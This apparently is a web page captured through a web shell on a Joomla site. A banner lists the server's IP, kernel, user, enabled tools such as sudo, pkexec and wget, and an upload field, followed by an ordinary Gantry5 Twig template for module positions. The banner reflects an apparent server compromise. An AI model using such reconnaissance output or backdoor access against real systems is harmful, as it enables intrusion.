| Server IP : 172.67.191.97 / Your IP : 104.23.197.208 Web Server : Apache/2.4.63 (Ubuntu) System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.4.5 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/fcs/administrator/components/com_gantry5/templates/pages/positions/ |
Upload File : |
{% set statuses = {
all: {
'label': 'Assigned to all',
'icon': '<i class="fa item-status fa-fw fa-circle" aria-hidden="true"></i>'
},
none: {
'label': 'Not assigned',
'icon': '<i class="far item-status fa-fw fa-circle" aria-hidden="true"></i>'
},
some: {
'label': 'Some assignments',
'icon': '<i class="fa item-status fa-fw fa-adjust" aria-hidden="true"></i>'
}
} %}
<li data-pm-blocktype="{{ module.type }}" data-pm-data="{{ module.toJson()|e('html_attr') }}">
{% set status = statuses[module.assigned] %}
{#<i class="fa fa-reorder font-small item-reorder size-10" aria-hidden="true"></i>#}
<div class="title size-90">
<span class="title-status" title="{{ status.label }}" data-tip="{{ status.label }}" aria-label="{{ status.label }}">{{ status.icon|raw }}</span>
<span class="title-name" title="Type: {{ module.options.type }} (id: {{ module.name }})">{{ module.title|default(module.name) }}</span>
</div>
<i class="fa item-settings fa-cog size-10" aria-hidden="true"></i>
</li>